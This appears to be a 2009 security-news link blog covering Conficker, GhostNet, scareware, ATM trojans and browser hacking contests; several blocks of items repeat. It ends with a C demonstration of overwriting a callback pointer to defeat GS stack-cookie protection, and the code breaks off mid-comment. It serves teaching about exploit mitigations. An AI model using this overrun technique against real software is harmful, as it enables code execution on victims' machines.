A good write-up of some of the stuff Microsoft is doing to disrupt the Conficker worm.
http://blogs.technet.com/msrc/
----------
A write-up from MS Security about ways to exploit the file gdiplus.dll, as in the recent EMF patch.
http://blogs.technet.com/srd/
----------
An interesting article on the method Conficker uses to patch machines after it infects them. Apparently it doesn't do a complete job of protecting the machines after it takes them over, so they can be detected.
"Prior to our research, it was believed when Conficker infected computers, it patched them, so that one could not tell who's infected and who's not, and any vulnerable computer that was already infected was considered not vulnerable," Honeynet founder Lance Spitzner said.
...
Over the weekend, the Cabal worked with the curators of a half-dozen organizations that maintain software vulnerability scanning tools, to help them build updates that would enable their tools to distinguish between Windows systems equipped with the official and rogue security patch. As a result, the new detection should be available now in free vulnerability scanners such as nMap, as well as vendor-driven scanning tools from Tenable, McAfee, nMap, nCircle and Qualys.
Posted by Brian Krebs
----------
Massive Chinese Espionage Network
The story broke in The New York Times yesterday:
In a report to be issued this weekend, the researchers said that the system was being controlled from computers based almost exclusively in China, but that they could not say conclusively that the Chinese government was involved.
[...]
Their sleuthing opened a window into a broader operation that, in less than two years, has infiltrated at least 1,295 computers in 103 countries, including many belonging to embassies, foreign ministries and other government offices, as well as the Dalai Lama's Tibetan exile centers in India, Brussels, London and New York.
The researchers, who have a record of detecting computer espionage, said they believed that in addition to the spying on the Dalai Lama, the system, which they called GhostNet, was focused on the governments of South Asian and Southeast Asian countries.
The Chinese government denies involvement. It's probably true; these networks tend to be run by amateur hackers with the tacit approval of the government, not the government itself. I wrote this on the topic last year.
It's only circumstantial evidence that the hackers are Chinese:
In a report to be issued this weekend, the researchers said that the system was being controlled from computers based almost exclusively in China, but that they could not say conclusively that the Chinese government was involved.
And here's the report, from the University of Toronto.
Good commentary by James Fallows:
My guess is that the "convenient instruments" hypothesis will eventually prove to be true (versus the "centrally controlled plot" scenario), if the "truth" of the case is ever fully determined. For reasons the Toronto report lays out, the episode looks more like the effort of groups of clever young hackers than a concentrated project of the People's Liberation Army cyberwar division. But no one knows for certain, and further information about the case is definitely worth following.
An excellent article on Wired.com, and another on ArsTechnica.
----------
I love IT timelines: Mary Jo Foley: Users already honing their IE 9 wish lists
----------
Ahh, so this is why Firefox came out with a new version all of a sudden:
Mozilla kills Firefox Pwn2Own bug
----------
Accenture: Some clients are operating without annual budgets
Larry Dignan: For a few months now, it seemed as if enterprise technology spending was a month-to-month affair. Accenture confirmed that theory and cut its outlook for the rest of the year.
----------
GhostNet spy network phishes international victims
Chuck Miller March 30, 2009
The recently uncovered cyberespionage network named GhostNet made use of phishing malware to attack the nearly 1,300 computers that are said to have been compromised by servers traced to China.
----------
New variant of RSPlug Mac trojan
Angela Moscaritolo March 30, 2009
A new variant of the RSPlug trojan, which targets Apple machines, was recently discovered in the wild, but quickly was fixed.
----------
Google: No significant security issues with Google Docs
Chuck Miller March 27, 2009
Despite apparent security issues in Google Docs, the company is playing down the risks.
----------
Fatal attraction: Latest "delivery notice" trojan spews forth
Greg Masters March 27, 2009
A new torrent of spam, disguised as a message from package carrier DHL, is making its way into inboxes.
----------
Washington D.C. Restaurants Become Credit Card Cloning Hot Spots
Four former servers at three upscale Washington D.C. restaurants blocks from the White House were arrested last week for allegedly using covert skimming devices to clone customer credit card data, in a year-long counterfeiting operation that's put $750,000 in fraudulent charges on the plastic of Washington's elite.
...
The servers often earn up to $50 per card if they work at an upscale eatery, down to just $10 each if, as in a recent Florida case, the cards were stolen from a Burger King.
----------
Electronic Spy Network Focused on Dalai Lama and Embassy Computers
...
More than 1,200 computers at embassies, foreign ministries, news media outlets and non-governmental organizations based primarily in South and Southeast Asia have been infiltrated by the network since at least the spring of 2007, according to the researchers' detailed 53-page report. So have computers in the offices of the Dalai Lama, the Asian Development Bank and the Associated Press in the United Kingdom and Hong Kong.
----------
No, The Recession Is Not Driving People To Dial-Up
----------
Legal Group’s Neutrality Is Challenged
By ADAM LIPTAK 1:35 PM ET
Studies suggest that the American Bar Association gives better ratings to liberal nominees than conservative ones.
----------
Europe’s Solution: Take More Time Off
Can the idea of shorter workweeks take hold in the U.S.?
----------
McAfee blog post about another fake AntiVirus program:
Another Day, Another Rogue Security Program
----------
Microsoft To Shutter Encarta, Read All About It On Wikipedia
Microsoft is preparing to shut down Encarta, the digital encyclopedia it first launched in 1993...
----------
Poken Peek
The Poken is a little USB stick you keep on your keychain. You link it to your online identities. To befriend other Poken owners, you just have to hold your Pokens together for a second, and they’ll exchange IDs through RFID. The Poken is popular in The Netherlands, not only among children, but adults too. No more need to exchange business cards.
----------
A DLP Program That May Actually Prevent Data Theft
Motorola CSO Bill Boni, Disney Company Information Security Director Dan Swartwood and British Telecom Senior Security Advisor Jason Stradley discuss what they've done to keep data out of enemy hands (Audio).
----------
Monday, March 30, 2009
Friday, March 27, 2009
Friday 03/27/09
March 26, Spamfighter – (Montana) Mountain West Bank consumers targeted by phishing scam.
http://www.spamfighter.com/News-12077-Mountain-West-Bank-Consumers-Targeted-by-Phishing-Scam.htm
----------
March 26, Associated Press – (New York) ‘Super’ test at ORNL. A high-tech power cable designed to prevent rolling blackouts caused by everything from a wayward squirrel to terrorists is being readied for New York City’s financial district. Now undergoing final tests at the Oak Ridge National Laboratory, the superconductor cable to be installed in Manhattan next year could prove key to the smart, secure, super grid of the future. Scientists fired 60,000 amps through a cable during a critical test on March 24 — an electrical jolt comparable to turning on the air conditioning in 2,000 homes at the same time. It was enough juice to lift a 1,000-pound bundle of conventional cable two feet off the ground. But nothing seemed to happen. No sparks, no sound, no movement. Chilled by liquid nitrogen to minus-321 degrees Fahrenheit, this cable becomes super-efficient when cool, carrying up to 10 times more electricity than a copper cable of the same diameter. It also has a unique, built-in, surge-suppressing capability. Power distribution now follows a hub-and-spoke design. That means the failure of a single power station can put a cluster of neighborhoods in the dark. This latest superconductor cable promises to link power stations so they can operate "more like an Internet" and back each other up. The $39 million project will lay superconductor cable linking two large Consolidated Edison Corp. substations about 1,000 feet apart serving thousands of people on Manhattan’s west side. Source: http://www.knoxnews.com/news/2009/mar/26/super-test-at-ornl/
----------
March 26, Economic Times – (International) Software labs warn of ATM virus that steals money from banks. Russia’s leading computer security labs have warned of a new software virus which infects Automatic Teller Machines (ATM) to steal money from bank accounts of their users. Two leading anti-virus software producers ‘Doctor Web’ and ‘Kaspersky Lab’ claimed to have discovered a new virus, in the networks of several bank ATMs, which is able to collect information from bank cards. "This is a malicious program intended to infect and survive in ATMs. It is possible that new software will appear, aimed at illegitimately using banking information and removing funds," an official of the Kaspersky Lab was quoted as saying by RIA Novosti news agency. He said the virus is a Trojan which is able to infect the popular American Diebold brand of ATMs, used in Russia and Ukraine. Judging by the programming code used, there is a high probability that the programmer comes from one of the former Soviet republics, he added. The computer security experts say the number of infected ATMs is minimal but individual bank cardholders will not be able to detect whether an ATM is infected or not. Source: http://economictimes.indiatimes.com/Infotech/ATM-virus-that-steals-money/articleshow/4319363.cms
-----------
March 26, Jakarta Post – (International) Bird flu suspect dies in Pekanbaru. A two-year-old boy, who had been intensively treated for a suspected bird flu case, died in an isolated room at Arifin Achmad Hospital in Pekanbaru, Riau early Thursday morning. The boy was admitted as a bird flu suspect last Friday after he had been treated at another hospital for six days. The hospital has yet to announce whether the boy died of bird flu because it was still waiting for nasal and throat swab test results from the health ministry laboratory in Jakarta. Source: http://www.thejakartapost.com/news/2009/03/26/bird-flu-suspect-dies-pekanbaru.html
----------
March 26, IDG News Service – (International) Firefox fix due next week after attack is published. Online attack code has been released targeting a critical, unpatched flaw in the Firefox browser. The attack code, written by a security researcher, was published on several security sites on March 25, sending Firefox developers scrambling to patch the issue. Until the flaw is patched, this code could be modified by attackers and used to sneak unauthorized software onto a Firefox user’s machine. Mozilla developers have already worked out a fix for the vulnerability. It is slated to ship in the upcoming 3.0.8 release of the browser, which developers are now characterizing as a "high-priority firedrill security update," thanks to the attack code. That update is expected sometime early next week. "We... consider this a critical issue," said the Mozilla director of security engineering in an e-mail. The bug affects Firefox on all operating systems, including Mac OS and Linux, according to Mozilla developer notes on the issue. By tricking a victim into viewing a maliciously coded XML file, an attacker could use this bug to install unauthorized software on a victim’s system. This kind of Web-based malware, called a drive-by download, has become increasingly popular in recent years. While the public release of browser attack code does not happen all that often, security researchers do not seem to have much trouble finding bugs in browser software. Last week, two hackers at the CanSecWest security conference dug up four separate bugs in the Firefox, IE, and Safari browsers. Source: http://www.networkworld.com/news/2009/032609-firefox-fix-due-next-week.html
----------
March 26, Bit-Tech.net – (International) Worm targets Linux routers. Users of Linux-based routers are being warned of a new worm in the wild which attempts to take control and add their device to a growing botnet.
http://www.bit-tech.net/news/bits/2009/03/26/worm-targets-linux-routers/1
Wednesday, March 25, 2009
Wednesday 03/25/09
New ransomware holds Windows files hostage, demands $50
Cybercrooks have found a new way of marketing fake security software, and are duping users into downloading a file utility that holds users' data for ransom, security researchers warned today.
----------
Senate committee demands DHS explain alleged lack of support for cybersecurity office
The Senate Homeland Security Committee's senior-most Republican is asking DHS Secretary Janet Napolitano to explain why the National Cyber Security Center (NCSC), set up within the department last year, has seemingly been marginalized by the agency.
----------
Heartland warns rivals about 'baseless' claims on postbreach Visa action
Heartland Payment Systems Inc. is warning rivals of possible legal action if they don't stop trying to lure away its customers by hinting that continuing to do business with the breached payment processor could expose companies to fines by Visa Inc. for noncompliance with the PCI data security rules.
In a message posted on Heartland's Web site on Monday, CEO Robert Carr said the company plans to sue competitors that don't "immediately" stop making what he described as "baseless and unlawful" claims related to Visa's removal of Heartland from its list of service providers that comply with the PCI rules (download PDF).
...
----------
Microsoft updates WGA to hunt down counterfeit Windows XP Pro
March 25, 2009 (Computerworld) Microsoft Corp., tacitly acknowledging the continued popularity of Windows XP, said yesterday that it was updating the operating system's antipiracy technology to detect illegal copies installed with newly stolen or faked product keys, or with new activation cracks.
In an entry to a company blog, Alex Kochis, director of Microsoft's Genuine Windows group, spelled out the update to WGA Notifications. That's the antipiracy component that provides the messages and other on-screen prompts when the other half of WGA, dubbed Validations, detects an illegal copy of the operating system.
----------
Cisco security updates squash router bugs
Eight big, new advisories that came out today (Wednesday): http://www.cisco.com/en/US/products/products_security_advisories_listing.html
The patches were released today, the day Cisco had previously scheduled for its twice-yearly IOS updates. None of the bugs have been publicly disclosed ahead of today's updates, but some of them were reported to Cisco by outside sources.
The eight updates fix 11 security vulnerabilities, according to Jean Reese, senior manager with Cisco's Product Security Incident Response Team.
----------
Adobe details secret PDF patches
Adobe Systems Inc. revealed today that it patched five critical vulnerabilities behind the scenes when it updated its Reader and Acrobat applications earlier this month to fix a bug already under attack.
According to a security bulletin issued today, the updates to Reader 9.1 and Acrobat 9.1 that Adobe delivered on March 10 included patches for not just one bug -- as Adobe indicated at the time -- but for five other vulnerabilities as well.
Foremost among the five were a quartet of bugs in Adobe's handling of JBIG2 compressed images, which was also at the root of the original vulnerability made public in February. When Adobe updated Reader and Acrobat to Version 9.1 two weeks ago, it fixed all five JBIG2 flaws, though it admitted only to the one at the time.
That bug has been used by hackers since at least early January, when they began sending malformed PDF files to users as e-mail attachments.
----------
China becoming the world's malware factory
With China's economy cooling down, some of the country's IT professionals are turning to cybercrime, according to a Beijing-based security expert.
Speaking at the CanSecWest security conference last week, Wei Zhao, CEO of Knownsec, a Beijing security company, said that while many Chinese workers may be feeling hard times, business is still booming in the country's cybercrime industry. "As the stock market dropped like a stone, a lot of IT professionals lost lots of money on the stock market," he said. "So sometimes they sell zero days," he said, referring to previously unknown software bugs.
"China is not only the world's factory, but also the world's malware factory," Zhao said.
----------
Nasty New Worm Targets Home Routers, Cable Modems
PC World - Wed Mar 25, 11:30 AM ET
A computer worm has been discovered that can infect 55 different home-based routers and DSL/cable modems including common brands like Linksys and Netgear.
----------
Teen hacker turns corporate cyber-crime consultant
AP - Wed Mar 25, 9:13 AM ET
WELLINGTON, New Zealand - A New Zealand teenager who helped a crime gang hack into more than 1 million computers worldwide and skim millions of dollars from bank accounts has a new job as a security consultant for a telecom company.
----------
Macs: Not as Secure as We Thought?
When it comes to technology, security is a relative term.
----------
Web Scam Nets Criminals $10,800 a Day
No crunch here, finds Finjan.
----------
Monday, March 23, 2009
Monday 03/23/09
Crooks Flock to Rogue Antivirus Apps
PC World - Fri Mar 20, 1:28 PM ET
Chasing massive profits, crooks have unleashed a flood of rogue antivirus programs that attempt to fool or scare unsuspecting PC users into forking over cash for an app that does nothing worthwhile.
----------
A Search Is Launched for Conficker's First Victim
PC World - Fri Mar 20, 4:20 AM ET
Where did the Conficker worm come from? Researchers at the University of Michigan are trying to find out, using a vast network of Internet sensors to track down the so-called "patient zero" of an outbreak that has infected more than 10 million computers to date. (Here's how to protect yourself.)
----------
A scholarly paper on the Conficker worm from SRI International:
http://mtc.sri.com/Conficker/addendumC/
A sample line from the report: "One interesting and minimally explored aspect of Conficker is its early and sophisticated adoption of binary encryption, digital signatures, and advanced hash algorithms to prevent third-party hijacking of the infected population."
----------
Microsoft's IE8 Catches Most 'Social Malware'
PC Magazine - Fri Mar 20, 11:23 AM ET
A study by NSS Labs of 6 major web browsers shows a large difference in their ability to block "socially engineered malware." The study was funded by Microsoft.
----------
A Hacking Tool Gets Updated for the Mac
PC World - Thu Mar 19, 6:10 PM ET
Two well-known Mac hackers are updating a widely used hacking toolkit, making it easier to take control of a Macintosh computer.
----------
Mar 23, 12:30 am
Symantec Says Credit Card Data May Have Leaked From India
Security firm stops routing calls to Indian call center after BBC report of data theft.
----------
Mar 22, 10:12 am
Diebold Admits Voting Machine Flaw
Software errors may have lost votes in California election.
----------
Mar 21, 12:06 pm
Online Fraud Hits Airlines Hard
A report finds airlines worldwide lost more than $1.4 billion to fraudsters in 2008.
----------
Mar 20, 1:44 pm
Doctors Say Effort to Digitize Medical Records Is Not Worth It
Harvard Medical School doctors warn that the shift to electronic medical records is not worth $19 billion of the stimulus pie.
----------
Small Business: The New Black In Cybercrime Targets
Enticed by poor defenses of mom-and-pop shops, hackers turn away from hardened defenses of banks and large enterprises
----------
One of several articles about building a "cheap" security lab:
http://www.darkreading.com/security/management/showArticle.jhtml;jsessionid=TVBA1NCUEKJQUQSNDLOSKHSCJUNN2JVN?articleID=215901457
----------
A group has formed to combat the latest worm. The "Conficker Cabal" has the stated purpose to block, defeat and uninstall all copies of this worm. The announcement of the start of this group is here from Feb 12th, 2009:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090212
----------
Good article from SANS on Incident Handling. They break the process into six steps:
Preparation
Identification
Containment
Eradication
Recovery
Lessons learned
This article is on Preparation: Making the most of your runbooks
----------
Kentucky e-voting fraud manipulated voters, not machines
By Jon Stokes, Law & Disorder
Six people have been indicted in a Kentucky scandal that involves rigging an election by manipulating vote totals in electronic voting machines. But the folks allegedly behind the scam relied not on high-tech hacking skills, but on old-fashioned southern charm.
----------
Web Fraud 2.0: Data Search Tools for ID Thieves
Posted at 11:30 AM ET, 03/23/2009
...
For a payment of $3 each, I was able to find full Social Security numbers on four of the volunteers, as well as their most recent street addresses and birthdays.
Another set of three $3 payments allowed me to gather the mother's maiden name (MMN) on half of the volunteers. For both the SSN and MMN lookups, all that is required is the target's name, street number, and ZIP code.
...
Using the service pictured above, customers can check the available balance on a credit card for a $1 payment, by including just the credit card number, the name of the cardholder, and his or her address. According to one source who is investigating the back-end technology behind this credit card balance-checking service, the site's operators are dialing in to the automated voice response units at various card issuers, using Skype.
...
Other data points that users can query the target's date of birth (50 cents per lookup); mother's date of birth ($6); drivers license number ($8); background report ($15); and credit report ($24). The site also offers a service that automates the changing the billing address on a target's credit or debit card ($35).
----------
Justice Department Increasingly Looking Like The RIAA/MPAA's Legal Team
from the change-the-riaa-can-believe-in dept
It seems that the Obama administration is basically hiring the entire RIAA/MPAA/BSA legal team these days. It started off with the RIAA's favorite lawyer, then it hired the BSA's antipiracy enforcer, and now it's brought on two more of the entertainment industry's favorite lawyers, including Don Verrilli, who was one of the main guys arguing the entertainment industry's side in the infamous (and terribly decided) Grokster case. He also was the guy who argued the RIAA's case that the Jammie Thomas verdict shouldn't be thrown out (on that one, he lost, thankfully). Of course, if you're thinking things would have been any better had McCain won, just note that one of his legal advisors is gleefully cheering on these appointments. Still, as Ray Beckerman notes, Obama's own rules should preclude these guys working on issues related to those they used to represent. We'll see if that actually happens, though.
PC World - Fri Mar 20, 1:28 PM ET
Chasing massive profits, crooks have unleashed a flood of rogue antivirus programs that attempt to fool or scare unsuspecting PC users into forking over cash for an app that does nothing worthwhile.
----------
A Search Is Launched for Conficker's First Victim
PC World - Fri Mar 20, 4:20 AM ET
Where did the Conficker worm come from? Researchers at the University of Michigan are trying to find out, using a vast network of Internet sensors to track down the so-called "patient zero" of an outbreak that has infected more than 10 million computers to date. (Here's how to protect yourself.)
----------
A scholarly paper on the Conficker worm from SRI International:
http://mtc.sri.com/Conficker/addendumC/
A sample line from the report: "One interesting and minimally explored aspect of Conficker is its early and sophisticated adoption of binary encryption, digital signatures, and advanced hash algorithms to prevent third-party hijacking of the infected population."
----------
Microsoft's IE8 Catches Most 'Social Malware'
PC Magazine - Fri Mar 20, 11:23 AM ET
A study by NSS Labs of 6 major web browsers shows a large difference in their ability to block "socially engineered malware." The study was funded by Microsoft.
----------
A Hacking Tool Gets Updated for the Mac
PC World - Thu Mar 19, 6:10 PM ET
Two well-known Mac hackers are updating a widely used hacking toolkit, making it easier to take control of a Macintosh computer.
----------
Mar 23, 12:30 am
Symantec Says Credit Card Data May Have Leaked From India
Security firm stops routing calls to Indian call center after BBC report of data theft.
----------
Mar 22, 10:12 am
Diebold Admits Voting Machine Flaw
Software errors may have lost votes in California election.
----------
Mar 21, 12:06 pm
Online Fraud Hits Airlines Hard
A report finds airlines worldwide lost more than $1.4 billion to fraudsters in 2008.
----------
Mar 20, 1:44 pm
Doctors Say Effort to Digitize Medical Records Is Not Worth It
Harvard Medical School doctors warn that the shift to electronic medical records is not worth $19 billion of the stimulus pie.
----------
Small Business: The New Black In Cybercrime Targets
Enticed by poor defenses of mom-and-pop shops, hackers turn away from hardened defenses of banks and large enterprises
----------
One of several articles about building a "cheap" security lab:
http://www.darkreading.com/security/management/showArticle.jhtml;jsessionid=TVBA1NCUEKJQUQSNDLOSKHSCJUNN2JVN?articleID=215901457
----------
A group has formed to combat the latest worm. The "Conficker Cabal" has the stated purpose to block, defeat and uninstall all copies of this worm. The announcement of the start of this group is here from Feb 12th, 2009:
http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20090212
----------
Good article from SANS on Incident Handling. They break the process into six steps:
Preparation
Identification
Containment
Eradication
Recovery
Lessons learned
This article is on Preparation: Making the most of your runbooks
----------
Kentucky e-voting fraud manipulated voters, not machines
by Jon Stokes, Law & Disorder
Six people have been indicted in a Kentucky scandal that involves rigging an election by manipulating vote totals in electronic voting machines. But the folks allegedly behind the scam relied not on high-tech hacking skills, but on old-fashioned southern charm.
----------
Web Fraud 2.0: Data Search Tools for ID Thieves
Posted at 11:30 AM ET, 03/23/2009
...
For a payment of $3 each, I was able to find full Social Security numbers on four of the volunteers, as well as their most recent street addresses and birthdays.
Another set of three $3 payments allowed me to gather the mother's maiden name (MMN) on half of the volunteers. For both the SSN and MMN lookups, all that is required is the target's name, street number, and ZIP code.
...
Using the service pictured above, customers can check the available balance on a credit card for a $1 payment, by including just the credit card number, the name of the cardholder, and his or her address. According to one source who is investigating the back-end technology behind this credit card balance-checking service, the site's operators are dialing in to the automated voice response units at various card issuers, using Skype.
...
Other data points that users can query include the target's date of birth (50 cents per lookup); mother's date of birth ($6); driver's license number ($8); background report ($15); and credit report ($24). The site also offers a service that automates changing the billing address on a target's credit or debit card ($35).
----------
Justice Department Increasingly Looking Like The RIAA/MPAA's Legal Team
from the change-the-riaa-can-believe-in dept
It seems that the Obama administration is basically hiring the entire RIAA/MPAA/BSA legal team these days. It started off with the RIAA's favorite lawyer, then it hired the BSA's antipiracy enforcer, and now it's brought on two more of the entertainment industry's favorite lawyers, including Don Verrilli, who was one of the main guys arguing the entertainment industry's side in the infamous (and terribly decided) Grokster case. He also was the guy who argued the RIAA's case that the Jammie Thomas verdict shouldn't be thrown out (on that one, he lost, thankfully). Of course, if you're thinking things would have been any better had McCain won, just note that one of his legal advisors is gleefully cheering on these appointments. Still, as Ray Beckerman notes, Obama's own rules should preclude these guys working on issues related to those they used to represent. We'll see if that actually happens, though.
Friday, March 20, 2009
Friday 03/20/09
Researchers make wormy Twitter attack
Computer security researchers have devised a new Twitter attack that they say could spread virally, much like a worm on the microblogging service.
----------
A search is launched for Conficker's first victim
March 20, 2009 (IDG News Service) Where did the Conficker worm come from? Researchers at the University of Michigan are trying to find out, using a vast network of Internet sensors to track down the so-called "patient zero" of an outbreak that has infected more than 10 million computers to date.
The university uses so-called Darknet sensors that were set up about six years ago to keep track of malicious activity. With funding from the U.S. Department of Homeland Security, computer scientists have banded together to share data collected from sensors around the world.
"The goal is to get close enough so you can actually start mapping out how the spread started," said Jon Oberheide, a University of Michigan graduate student who is working on the project.
...
----------
Post-breach criticism of PCI security standard misplaced, Visa exec says
Visa pilots new payment card security initiatives
Acknowledging the need for controls that go beyond those offered by the Payment Card Industry (PCI) Data Security Standard, a senior Visa Inc. executive today described two new initiatives to reduce payment card fraud being tested by the company.
One of the pilots involves Fifth Third Bank, which is testing the use of magnetic stripe technology to create unique digital fingerprints for cards, said Ellen Richey, Visa's chief enterprise risk officer. Each stripe contains unique characteristics that can be captured and used to verify the digital identity of the card, Richey said at a security event being hosted by Visa today. The goal is to stop the creation and use of counterfeit cards based on stolen payment card data.
----------
Expert: Hackers penetrating industrial control systems
----------
Researcher hacks just-launched IE8
...
Just hours before Microsoft Corp. officially launched the final code for Internet Explorer 8, a German researcher yesterday hacked the browser during the PWN2OWN contest to win $5,000 and a Sony Vaio laptop.
The researcher, a computer science student from Germany who would only give his first name, Nils, broke into the Sony within minutes by exploiting a previously unknown vulnerability in the new browser, said Terri Forslof, manager of security response at 3Com Corp.'s TippingPoint, the contest sponsor. The laptop was running what Forslof described as a "recent Microsoft internal build" of Windows 7.
...
----------
Researcher cracks Mac in 10 seconds at PWN2OWN, wins $5k
...
"I can't talk about the details of the vulnerability, but it was a Mac, fully patched, with Safari, fully patched," said Miller on Wednesday, not long after he had won the prize. "It probably took five or 10 seconds." He confirmed that he had researched and written the exploit before he arrived at the challenge.
...
----------
Harvard professor apologizes to judge for faulty motion in RIAA music piracy case
In yet another twist to a music piracy case that already has attracted lots of attention, a Harvard University law professor who is defending a Boston University graduate student accused of copyright infringement by the Recording Industry Association of America (RIAA) apologized this week to a federal judge in Boston for wasting the court's time with one of his motions.
The written apology by Harvard Law School professor Charles Nesson came on Tuesday, a week after U.S. District Judge Nancy Gertner sharply rebuked Nesson over a motion he had filed seeking to depose a person who he claimed was a representative of the record companies that filed the lawsuit.
...
----------
Vulnerability Found In Intel CPU Caching
Mar 20, 2009
Flaw could allow attackers to remotely control Intel-based devices or extract data from memory
Stealthier than an MBR rootkit and more powerful than ring 0 control: the SMM rootkit, soon to be developed.
----------
Apple Imposes NDA for App Store Rejections
----------
TomTom fights Microsoft FAT32 lawsuit with suit of its own
by Jacqui Cheng, Law & Disorder
TomTom has filed a countersuit against Microsoft, accusing the software giant of infringing on three of its in-car navigational patents. The suit is just the latest in the back-and-forth between the two companies, though some believe they'll eventually just settle.
----------
Rogue Antivirus Distribution Network Dismantled
Posted at 01:08 PM ET, 03/20/2009
A major distribution network for rogue anti-virus products has been shut down following reports by Security Fix about massive profits that the network's affiliates were making for disseminating the worthless software.
On Monday, Security Fix profiled TrafficConverter2.biz, a program that pays affiliates handsome commissions for spreading "scareware" products like Antivirus2009 and Antivirus360. Scareware tries to frighten consumers into purchasing fake security software by pestering them with misleading and incessant warnings about threats resident on their systems.
According to a message posted at TrafficConverter2.biz and its sister sites, the program's credit card payment processor pulled the plug on them shortly after our story ran. TrafficConverter2.biz is currently unreachable...
----------
Antivirus2009 Holds Victim's Documents for Ransom
Posted at 06:35 AM ET, 03/20/2009
Security experts are warning that some new "scareware" programs, software that tries to frighten consumers into purchasing bogus security products, also encrypt the victim's digital documents until he or she agrees to pay a $50 ransom demand.
Newer versions of the scareware family Antivirus2009 warn users in a fake Windows alert that files in the "My Documents" folder are corrupt. The program then directs the victim to download a program called "FileFixerPro" to fix the supposedly corrupt files.
In fact, this version of Antivirus2009 encrypts or scrambles contents of documents in that folder, so that only users who pay $50 for a FileFixerPro license can get the decryption key needed to regain access to the files in their My Documents folder.
----------
New firewall for the Linux kernel
----------
Larry Dignan: The browser battle: What about security?
Special report: New battles loom with the introduction of Internet Explorer 8, Chrome beta, and Opera Turbo this week. As the browser makers wrangle over speed, rendering abilities, and new tools, experts are asking, what about security?
----------
Death of actress Natasha Richardson exploited by scareware
Greg Masters March 20, 2009
A day after news broke of the death of British actress Natasha Richardson, malicious websites sprung up to lure victims looking for information on the tragedy.
----------
Online Organ Transplant Scam Results in Death, Arrest
The authorities have arrested a U.S. fugitive in Guam accused of running a bogus online organ transplant service that duped the sick out of as much as $400,000 – a scam prosecutors said Thursday led to the death of a Canadian man awaiting a liver.
----------
Bugs found and announced to manufacturers but NOT patched yet:
http://dvlabs.tippingpoint.com/advisories/upcoming/
There are currently 82 advisories pending public disclosure.
----------
Wednesday, March 18, 2009
Wednesday 03/18/09
A Real Dumpster Dive: Bank Tosses Personal Data, Checks
Data protection is not just an IT security issue. But security industry analyst Steve Hunt, who heads up Hunt Business Intelligence, believes too many people in IT security still have that false perception.
----------
IT contractor indicted for sabotaging offshore rig management system
March 18, 2009 (Computerworld) An IT contract employee who formerly worked at an oil and gas production company in Long Beach, Calif., was indicted yesterday on charges of sabotaging a computer system he helped set up because the company did not offer him a permanent job.
The case is the latest to highlight the challenge that businesses face in trying to protect corporate systems and networks from rogue insiders and those with privileged access to systems, such as contractors and business partners. Security analysts have warned about the heightened threats such users pose to corporations because of the broader disgruntlement resulting from layoffs and other belt-tightening steps companies have taken during the recession.
----------
Vivek Kundra reinstated as federal CIO
March 17, 2009 (Computerworld) Vivek Kundra, who took a leave of absence from his job as the federal government's first CIO last week, was reinstated today after the White House determined that he has no connection to an alleged bribery scheme in the District of Columbia's IT department, where he previously was chief technology officer.
"Mr. Kundra has been informed that he is neither a subject nor a target of the investigation and has been reinstated," White House spokesman Nick Shapiro said via e-mail late today, in response to a query seeking confirmation of reports posted online by the Personal Democracy Forum's techPresident blog and The New York Times.
Kundra had been on leave since last Thursday, following the arrests of the D.C. IT department's acting chief security officer and the CEO of an outsourcing contractor on bribery and other charges. The arrests and a related raid on the district's IT offices took place as Kundra was speaking at FOSE 2009, a government IT conference in Washington, in his first major public appearance since being named federal CIO.
...
----------
Blogger who streamed pre-release Guns N' Roses songs deserves prison time, say feds
----------
D.C. IT bribery suspect to remain in jail; judge says evidence 'overwhelming'
----------
Criminals sneak card-sniffing software on Diebold ATMs
March 17, 2009 (IDG News Service) Diebold Inc. has released a security fix for its Opteva automated teller machines after cybercriminals apparently broke into the systems at one or more businesses in Russia and installed malicious software.
Diebold learned of the incident in January and sent out a global security update to its ATM customers using the Windows operating system. It is not releasing full details of what happened, including which businesses were affected, but said criminals had gained physical access to the machines to install their malicious program.
"Criminals gained physical access to the inside of the affected ATMs," Diebold said in its security update. "This criminal activity resulted in the operation of unauthorized software and devices on the ATMs, which was used to intercept sensitive information."
----------
Consumer Groups Launch Badware-busting Community
PC World - Tue Mar 17, 12:50 PM ET
The people behind StopBadware.org have launched a Web site where ordinary people can band together to fight computer viruses and adware.
----------
Social Networks' Risks for Business Security
Corporate social media has many positives, but security issues should not be overlooked.
----------
Adobe Security Bulletin Adobe Reader and Acrobat
Adobe has released security advisory APSB09-04 for Adobe Reader and Acrobat. The CVE entries related to the vulnerabilities being patched are CVE-2009-0658 and CVE-2009-0927. Current versions are now 9.1, 8.1.4, and 7.1.1. Updates for both Windows and Macintosh platforms are available.
----------
NSA Director: We Don't Want to Run Cybersecurity
CSO Publisher Bob Bragdon moderates the IT Security Entrepreneur's Forum at Stanford University and blogs about the keynote speech from NSA Director and Lt. Gen. Keith Alexander.
----------
GS cookie protection – effectiveness and limitations
Monday, March 16, 2009 4:15 PM
MSRC Engineering
The Microsoft C/C++ compiler supports the GS switch which aims to detect stack buffer overruns at runtime and terminate the process, thus in most cases preventing an attacker from gaining control of the vulnerable machine. This post will not go into detail about how GS works, so it may be helpful to refer to these MSDN articles for an overview and loads of detail on how GS works and what a GS cookie is. It’s important to note that depending on the exact vulnerability, even if a function is protected by a GS cookie, a stack-based buffer overrun may still be exploitable – for example if the attacker can gain control prior to the cookie check. However even in these circumstances, GS can often be a significant obstacle to exploitation and/or reliability of exploitation. There have been some stack-based attacks recently that were not mitigated by GS – this post takes a couple of examples and looks at why that was.
...
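An added illustration of the ordering problem the MSRC post describes (this is example code, not Microsoft's): the GS cookie is verified only when the protected function returns, so any local that the function uses before returning, here a callback pointer, can be hijacked by the overrun before the check ever runs. The frame is modelled as a struct so the overrun stays inside one object; the fixed cookie value, the known gadget address (no ASLR) and the payload bytes are assumptions made for the demo.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Simulated stack frame, laid out as a GS-protected function would have it:
 * the buffer lowest, then another local, then the cookie copy. */
struct frame {
    char buf[16];          /* the overrunnable local buffer */
    void (*cb)(void);      /* a local the function uses before it returns */
    uint32_t cookie;       /* copy of the GS cookie, checked only in the epilogue */
};

/* Assumed fixed value for the demo; the real __security_cookie is randomised
 * at process start, which is what stops an attacker writing it back. */
static const uint32_t SECURITY_COOKIE = 0xC0DE5EEDu;

static int gadget_ran;                          /* set when attacker code runs */
static void benign_cb(void) { }
static void attacker_gadget(void) { gadget_ran = 1; }

/* Simulates a GS-protected function containing an unbounded copy.
 * Returns 1 if the cookie check fired (real GS would call __report_gsfailure
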